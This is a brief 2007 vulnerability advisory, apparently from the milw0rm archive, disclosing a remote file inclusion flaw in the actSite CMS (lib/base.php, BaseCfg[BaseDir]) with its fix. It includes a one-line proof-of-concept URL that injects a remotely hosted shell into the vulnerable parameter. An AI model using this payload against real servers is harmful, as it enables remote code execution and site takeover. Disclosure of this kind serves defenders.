41 lines
No EOL
755 B
Text
41 lines
No EOL
755 B
Text
\#'#/
|
|
|
|
(-.-)
|
|
|
|
---------------------oOO---(_)---OOo--------------------
|
|
|
|
| actSite v1.991 Beta (base.php) Remote File Inclusion |
|
|
|
|
| coded by DNX |
|
|
|
|
--------------------------------------------------------
|
|
|
|
[!] Discovered: DNX
|
|
|
|
[!] Vendor: http://www.actsite.de
|
|
|
|
[!] Detected: 02.09.2007
|
|
|
|
[!] Reported: 02.09.2007
|
|
|
|
[!] Remote: yes
|
|
|
|
|
|
|
|
[!] Background: actSite is a content management system based on PHP and MySQL
|
|
|
|
|
|
|
|
[!] Bug: $BaseCfg[BaseDir] in lib/base.php
|
|
|
|
|
|
|
|
[!] PoC:
|
|
|
|
- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]
|
|
|
|
|
|
|
|
[!] Solution: Install update to v1.995
|
|
|
|
# milw0rm.com [2007-10-01] |